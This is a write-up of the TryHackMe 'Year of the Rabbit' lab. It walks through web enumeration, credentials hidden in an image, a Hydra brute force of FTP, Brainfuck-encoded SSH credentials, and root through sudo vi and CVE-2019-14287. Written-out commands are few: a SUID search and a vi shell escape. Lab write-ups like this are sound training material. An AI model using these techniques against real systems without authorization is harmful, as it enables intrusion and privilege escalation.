[EN] TryHackMe — Year of the Rabbit Write-Up

(April 2020)

Hello guys, it’s Anil Celik, a.k.a your friendly pwner 0xpr0N3rd on THM. Today I will share the write-up for the room named Year of the Rabbit (https://tryhackme.com/room/yearoftherabbit).

I really enjoyed this box while solving it and I thought I could prepare a write-up for it. By the way, this is my very first write-up on THM, so I hope you will enjoy it.

• As usual, let’s start with our initial nmap scan:

• Hmm, seems like we got something useful for ourselves. Before going further and performing a detailed nmap scan, (such as using -p- parameter to scan all ports on the machine) let’s start enumeration.
• We didn’t get any message saying that anonymous ftp login is allowed but I wanted to check whether I can login to ftp service as anonymous but that didn’t work. Also, I couldn’t find any vulnerability for the service version for the ftp service on neither on searchsploit nor any other place:

• Also, SSH port is not vulnerable. So, let’s go to the HTTP port for enumeration:

• When we go to port 80, we are being welcomed by the default page of Apache Web Service. Let’s try to find hidden directories with gobuster:

• Seems like we found something interesting: “/assets”, let’s go deeper:

• When we go to /assets , we see there are two files: First one is Rick Astley’s cool song named Never Gonna Give Up, which is useless in this case even though it’s a really good song. Next, try to inspect style.css:

• At last, something useful. Let’s go to this directory:

• Let me be honest with you; the exact moment I saw this I thought there was something going on in the back-end and I needed to intercept this traffic. So, go ahead and fire up your Burp Suite!

• Seems like my scepticism was right, we found another hidden directory. Let’s go to that directory:

• Oh, cool! Candy! Let’s see the inside of it:

• This photo reminded me of the legendary Turkish Actress Gulsen Bubikoglu (maybe it’s her drawing, I honestly don’t know that much). At this point, I thought there was something hidden inside this picture, because we don’t have anything else to go for it. Let’s download this picture. Friendly Reminder: In order to download something while protecting it’s content, using “wget” instead of a regular “Right-Click + Save” is more convenient.

• First things first, let’s exif this thing:

• Hmm, we didn’t get something that would make us satisfied. Anyways, we still got one more option, strings ! Let’s execute strings on this:

• JACKPOT! We get the FTP username and password-ish. What we can do here is that we can get all these possible password strings into a text file and….. HAIL HYDRA!

• Thank you Hydra. Let’s connect to the FTP server and find something special:

• We downloaded “Eli’s_Creds.txt”. That might be something, right? Open it immediately!

• Ah, shoot. Here we go again. I guess this one is a real rabbit hole. Anyways, after a research that cost me 1 hour, I found that these strings are representing the programming language named BrainFuck, don’t blame me, it’s the name. Let’s try to decrypt it:

• Dude, finally! Don’t waste any more time and open an SSH connection with eli immediately:

• We are in! Let’s look for user.txt, shall we?

• Well, user.txt is not in here, nor in some place that eli is privileged to access on. After a little bit more enumeration, I see that user.txt is owned by a user named gwendoline:

• Note that when we first connected to SSH, there was a message which might have a meaning for us to torch our way:

• Dude, there is a message from root to gwendoline! Let’s find this thing:

• I guess that’s gwendoline’s password. Try it:

• Yassss! We got the user! From here, let’s try to escalate our privileges. Firstly, I prefer to check SUIDs to see whether there is a misconfigured SUID bit which can be exploited: (find / -user root -perm -4000 -exec ls -ldb {} \;)

• I tried to find a way to exploit the SUID bits that we have access on but nothing worked. Let’s go for “sudo -l”:

• For those who might don’t know what “sudo -l” is; “sudo -l” shows us the sudo permissions of the current user that we are logged on at the moment. From above, we can see that user gwendoline can edit the file /home/gwendoline/user.txt with sudo privileges using /usr/bin/vi. Hmm, maybe there is something useful for this one on GTFOBins, let’s check it:

• Bingo! Let’s try it:

• :///////////////////////////////// At this point, I really got stuck and went to search more commands to exploit this sudo command. At the end, when it was 5 a.m. and when my brain was about to melt, I found a vulnerability that can help me (thanks to Ekko ❤), this vulnerability is CVE-2019–14287:

• When we go down, we can see something like:

• Yes, this is the command that will help us:

• When we enter the command above, a Vim editor will be opened, then we need to go to the command line by typing “:” and “!/bin/sh”, this will give us the shell:

• That’s it! Go and capture the flag!

That was all that I wanted to share you with.

Hope you guys enjoyed this, thank you for reading!

Hopefully, see you in my next write-ups!